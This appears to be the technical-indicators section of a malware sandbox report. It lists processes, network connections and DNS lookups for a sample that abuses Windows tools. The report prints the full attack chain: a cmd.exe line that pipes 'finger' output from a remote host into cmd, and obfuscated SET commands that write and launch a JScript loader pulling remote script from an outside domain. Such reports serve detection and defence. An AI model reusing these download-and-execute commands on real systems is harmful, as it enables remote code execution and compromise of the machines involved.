Technical Information
- '<SYSTEM32>\finger.exe' ok@teoi5w.moguor.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\BZc.js"
- C:\users\public\bzc.js
- 'te####.moguor.xyz':79
- 'a8####.vuiworn.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'te####.moguor.xyz':79
- 'cl###flare.com':443
- DNS ASK te####.moguor.xyz
- DNS ASK a8####.vuiworn.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@teoi5w.moguor.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt DGJE=.j&&SEt HRVUG=voYAdaroYAd a =oYAd 'scoYAdrioYAdptoYAd:'; b =oYAd 'hoYAdTtPoYAd:'; GoYAdetoYAdObjoYAdecoYAdt(oYAda+b+'&&sET WCTU=DMICEDMICEa8aoiw.vuiworn.xyzDMICE?1DMICE')&&sEt/...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p KQ1ZR="%HRVUG:oYAd=%%WCTU:DMICE=/%" 0<nul 1>C:\Users\Public\BZc%DGJE%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\BZc%DGJE%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\BZc.js